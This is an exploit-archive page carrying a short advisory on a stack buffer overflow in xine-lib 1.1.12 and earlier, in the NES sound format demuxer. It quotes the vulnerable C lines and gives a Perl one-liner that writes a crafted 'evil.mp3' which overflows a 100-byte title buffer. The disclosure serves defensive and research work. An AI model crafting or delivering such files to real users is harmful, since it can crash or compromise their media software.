xinelib-overflow.txt

xinelib-overflow.txt: Posted Apr 17, 2008; Authored by Guido Landi; xine-lib versions 1.1.12 and below suffer from a stack-based buffer overflow vulnerability in the NES sound format demuxer (demux_nsf.c).; tags | exploit, overflow; SHA-256 | 091bbf5d39beb0c8cf8db84e31934c03fcce9f420df92d712585dade81a50370; Download | Favorite | View

xinelib-overflow.txt

xine-lib <= 1.1.12 is prone to a stack-based buffer overflow in the NES 
Sound Format demuxer(demux_nsf.c).


- Code

open_nsf_file():

109: this->title = strdup(&header[0x0E]);

demux_nsf_send_chunk():

122: char title[100];
162: sprintf(title, "%s, song %d/%d",
            this->title, this->current_song, this->total_songs);


- Affected applications

http://xinehq.de/index.php/releases


- PoC

perl -e 'print 
"\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" . "\x41" x 
114' > evil.mp3

Top Authors In Last 30 Days

Red Hat 308 files
Ubuntu 67 files
Debian 24 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

xinelib-overflow.txt

xinelib-overflow.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

xinelib-overflow.txt

Share This

xinelib-overflow.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems